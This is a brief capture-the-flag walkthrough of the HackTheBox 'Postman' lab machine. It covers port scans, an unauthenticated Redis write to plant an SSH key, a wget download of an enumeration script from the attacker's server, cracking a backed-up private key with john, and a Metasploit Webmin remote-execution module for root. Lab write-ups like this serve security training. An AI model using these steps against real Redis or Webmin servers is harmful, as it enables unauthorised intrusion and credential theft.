Postman Writeup Hackthebox

Postman

Hello readers, this is not a write-up but a quick walk through of the postman box on hackthebox , just to give a quick path for pwning the box. Follow me on twitter for more.

# About

1. Name: Postman
2. IP: 10.10.10.160
3. Level: Easy
4. Os: Linux
5. Released : 02/Nov/2019

# Enumeration

Commands used for recon:

• nmap -sC -sV -oN nmap.txt 10.10.10.160
• nmap -sC -sV -oN nmap_all.txt -p- 10.10.10.160
• gobuster -u http://10.10.10.160/ -w <path to wordlist> -t 20 -o dirscan1.txt
• `gobuster -u http://10.10.10.160:10000 -w <path to wordlist> -t 20 -o dirscan2.txt`

Following results were found from the recon.

1. Bootstrap 4.0 and jQuery 1.12 on port 80.
2. 22 OpenSSH 7.6p1 ( No working exploit found)
3. 80 Apache httpd 2.4.29 ( No working exploit found)
4. 10000 port http (Webmin — MiniServ 1.910)
5. Operating System (Ubuntu 4ubuntu0.3)
6. ‘http://10.10.10.160/uploads’ directory found on port 80.
7. ‘https://postman:10000/session_login.cgi ’(Login url found).
8. Redis key-value store 4.0.9 on port 6379 (Revealed after full port scan) .

# Exploitation (User)

1. Found a exploit for redis service on port 6379 on github .
2. Tweaked the exploit to change the ‘config set dir’ command to ‘command set dir /var/lib/redis/.ssh’
3. Logging in with ssh gives us a low privileged shell as user ‘redis’ on the box.
4. Create a python http server on our machine to transfer our linenum script to the box.
   python3 http.server
5. Downloading the script to host
   wget http://<ip of your machine>:8000/linenum.sh
6. Running linenum enumeration script on the host reveals a ‘id_rsa.back’ file present in ‘/opt’ directory.
7. Copying the contents of the ‘ id_rsa.bak’ file to our machine.
8. Convert the file to john format.
   ssh2john id_rsa.back > hash.txt
9. Dictionary attack on the file reveals the password ‘computer2008’ for the user Matt.
   john — wordlist=/usr/share/wordlists/rockyou.txt hash.txt
10. From our previous redis shell we login as user ‘Matt’ using password ‘computer2008’.
    su Matt
11. Traversing to Matt’s home directory and finding ‘user.txt’
    cd /home/matt ; cat user.txt
12. We get our user flag.

# Exploitation(Root)

1. For root escalation we exploit the ‘webmin’ hosted on port 10000.
2. We use webmin package updates remote command execution exploit present in metasploit.
3. sudo msfconsole to open metasploit.
4. Change options of the exploit by the following commands.
5. set ssl on
6. set username Matt
7. set password computer2008
8. set LHOST tun0
9. set RHOST 10.10.10.160
10. exploit
11. We get a shell as root on the box
12. cat root/root.txt gives us the root flag.

This is how we can pwn the postman box. Hope you all find this useful. I will try to create detailed write-ups for boxes in the future (if i don’t feel lazy xD).